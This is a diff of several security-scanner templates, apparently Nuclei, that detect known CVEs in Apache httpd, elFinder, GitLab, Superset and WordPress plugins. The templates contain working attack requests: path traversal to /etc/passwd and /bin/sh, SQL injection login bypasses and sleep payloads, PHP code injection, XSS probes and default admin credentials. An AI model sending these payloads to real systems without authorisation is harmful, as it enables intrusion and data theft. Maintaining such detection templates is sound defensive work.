A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
reference:
|
||||
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|
||||
|
@ -12,15 +13,14 @@ info:
|
|||
- https://twitter.com/ptswarm/status/1445376079548624899
|
||||
- https://twitter.com/h4x0r_dz/status/1445401960371429381
|
||||
- https://github.com/blasty/CVE-2021-41773
|
||||
remediation: Update to Apache HTTP Server 2.4.50 or later.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-41773
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
shodan-query: apache version:2.4.49
|
||||
verified: "true"
|
||||
shodan-query: Apache 2.4.49
|
||||
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
|
||||
|
||||
variables:
|
||||
|
@ -32,6 +32,10 @@ requests:
|
|||
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -42,7 +46,6 @@ requests:
|
|||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
name: LFI
|
||||
regex:
|
||||
|
|
|
@ -0,0 +1,52 @@
|
|||
id: CVE-2021-43421
|
||||
|
||||
info:
|
||||
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
|
||||
author: akincibor
|
||||
severity: critical
|
||||
description: |
|
||||
A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
|
||||
reference:
|
||||
- https://github.com/Studio-42/elFinder/issues/3429
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
|
||||
- https://twitter.com/infosec_90/status/1455180286354919425
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-43421
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,elfinder,upload,rce,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
|
||||
- |
|
||||
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_3, "{{randstr_1}}")'
|
||||
- "status_code == 200"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: hash
|
||||
group: 1
|
||||
regex:
|
||||
- '"hash"\:"(.*?)"\,'
|
||||
internal: true
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-43510
|
||||
|
||||
info:
|
||||
name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
|
||||
- https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43510
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-43510
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=admin'+or+'1'%3d'1'--+-&password=as
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(all_headers_1, "text/html")'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(body_1, "{\"status\":\"success\"}")'
|
||||
- 'contains(body_2, "Welcome to Simple Client")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -17,18 +17,22 @@ info:
|
|||
metadata:
|
||||
shodan-query: http.html:"kkFileView"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,kkfileview,traversal
|
||||
tags: cve,cve2021,kkfileview,traversal,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
|
||||
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0:"
|
||||
- "for 16-bit app support"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-43778
|
||||
|
||||
info:
|
||||
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
|
||||
name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
|
||||
|
|
|
@ -1,20 +1,25 @@
|
|||
id: unauth-rlm
|
||||
id: CVE-2021-44152
|
||||
|
||||
info:
|
||||
name: Reprise License Manager 14.2 - Authentication Bypass
|
||||
author: Akincibor
|
||||
severity: critical
|
||||
description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
|
||||
description: |
|
||||
Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
|
||||
- https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes
|
||||
- http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-44152
|
||||
cwe-id: CWE-287
|
||||
tags: unauth,rlm,packetstorm
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"Reprise License Manager"
|
||||
google-dork: inurl:"/goforms/menu"
|
||||
tags: cve2021,rlm,auth-bypass,packetstorm,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -23,13 +28,13 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "RLM Administration Commands"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/03
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-44451
|
||||
|
||||
info:
|
||||
name: Apache Superset Default Login
|
||||
name: Apache Superset - Default Login
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
|
||||
description: |
|
||||
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
|
||||
reference:
|
||||
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
|
||||
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
|
||||
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 6.5
|
||||
|
@ -25,17 +25,18 @@ requests:
|
|||
- |
|
||||
GET /login/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
|
||||
- |
|
||||
POST /login/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}/admin/airflow/login
|
||||
|
||||
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
GET /dashboard/list/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
|
@ -43,32 +44,25 @@ requests:
|
|||
password:
|
||||
- admin
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header_2
|
||||
words:
|
||||
- 'session'
|
||||
|
||||
- type: word
|
||||
part: body_3
|
||||
words:
|
||||
- 'DashboardFilterStateRestApi'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf_token
|
||||
group: 1
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- 'value="(.*?)">'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: and
|
||||
words:
|
||||
- '<title>Redirecting...</title>'
|
||||
- '<h1>Redirecting...</h1'
|
||||
- '<a href="/">'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'session'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
# Enhanced by mp on 2022/03/02
|
||||
- 'name="csrf_token" type="hidden" value="(.*)"'
|
||||
internal: true
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-45232
|
||||
|
||||
info:
|
||||
name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
|
||||
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
|
||||
author: Mr-xn
|
||||
severity: critical
|
||||
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0147
|
||||
|
||||
info:
|
||||
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
|
||||
name: WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting
|
||||
author: 8arthur
|
||||
severity: medium
|
||||
description: |
|
||||
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
|
||||
WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
|
||||
- https://wordpress.org/plugins/wp-gdpr-compliance/
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0346
|
||||
|
||||
info:
|
||||
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting
|
||||
author: Akincibor
|
||||
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
|
||||
author: Akincibor,theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
|
||||
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
|
||||
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
|
||||
|
@ -17,34 +17,27 @@ info:
|
|||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
|
||||
tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
|
||||
stop-at-first-match: true
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
|
||||
- "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, ' type specified')"
|
||||
condition: or
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- "<img src onerror=alert(document.domain)>"
|
||||
- "Invalid Provider type specified"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
part: body_2
|
||||
words:
|
||||
- text/html
|
||||
- "2ef3baa95802a4b646f2fc29075efe34"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '>PHP Version <\/td><td class="v">([0-9.]+)'
|
||||
|
||||
# Enhanced by md on 2022/09/08
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-0349
|
||||
|
||||
info:
|
||||
name: WordPress NotificationX <2.3.9 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
|
||||
- https://wordpress.org/plugins/notificationx/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0349
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0349
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
nx_id=sleep(6) -- x
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "\"data\":{\"success\":true}")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0434
|
||||
|
||||
info:
|
||||
name: Page Views Count < 2.4.15 - Unauthenticated SQL Injection
|
||||
name: WordPress Page Views Count <2.4.15 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Unauthenticated SQL Injection in WordPress Page Views Count Plugin (versions < 2.4.15).
|
||||
WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
|
||||
- https://wordpress.org/plugins/page-views-count/
|
||||
|
@ -38,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,100 @@
|
|||
id: CVE-2022-0735
|
||||
|
||||
info:
|
||||
name: GitLab CE/EE - Runner Registration Token Disclosure
|
||||
author: GitLab Red Team
|
||||
severity: critical
|
||||
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands.
|
||||
reference:
|
||||
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
|
||||
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0735
|
||||
cwe-id: CWE-863
|
||||
metadata:
|
||||
shodan-query: http.title:"GitLab"
|
||||
tags: cve,cve2022,gitlab
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/users/sign_in"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
|
||||
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
|
||||
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
|
||||
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
|
||||
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
|
||||
- "1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8"
|
||||
- "1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7"
|
||||
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
|
||||
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
|
||||
- "2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f"
|
||||
- "2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be"
|
||||
- "301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0"
|
||||
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
|
||||
- "383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7"
|
||||
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
|
||||
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
|
||||
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
|
||||
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
|
||||
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
|
||||
- "4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7"
|
||||
- "50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9"
|
||||
- "515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe"
|
||||
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
|
||||
- "57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de"
|
||||
- "5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4"
|
||||
- "5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f"
|
||||
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
|
||||
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
|
||||
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
|
||||
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
|
||||
- "775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df"
|
||||
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
|
||||
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
|
||||
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
|
||||
- "8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353"
|
||||
- "90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159"
|
||||
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
|
||||
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
|
||||
- "a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d"
|
||||
- "a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe"
|
||||
- "a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b"
|
||||
- "a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2"
|
||||
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
|
||||
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
|
||||
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
|
||||
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
|
||||
- "ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1"
|
||||
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
|
||||
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
|
||||
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
|
||||
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
|
||||
- "c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209"
|
||||
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
|
||||
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
|
||||
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
|
||||
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
|
||||
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
|
||||
- "e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488"
|
||||
- "e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee"
|
||||
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
|
||||
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
|
||||
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
|
||||
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '(?:application-)(\S{64})(?:\.css)'
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0785
|
||||
|
||||
info:
|
||||
name: Daily Prayer Time < 2022.03.01 - Unauthenticated SQLi
|
||||
name: WordPress Daily Prayer Time <2022.03.01 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Daily Prayer Time WordPress plugin before 2022.03.01 does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
|
||||
WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
|
||||
- https://wordpress.org/plugins/daily-prayer-time-for-mosques/
|
||||
|
@ -34,3 +34,5 @@ requests:
|
|||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2022-0786
|
||||
|
||||
info:
|
||||
name: KiviCare < 2.3.9 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30
|
||||
- https://wordpress.org/plugins/kivicare-clinic-management-system/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0786
|
||||
classification:
|
||||
cve-id: CVE-2022-0786
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,kivicare-clinic-management-system,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Doctor details")'
|
||||
condition: and
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0788
|
||||
|
||||
info:
|
||||
name: WP Fundraising Donation and Crowdfunding Platform < 1.5.0 - Unauthenticated SQLi
|
||||
name: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
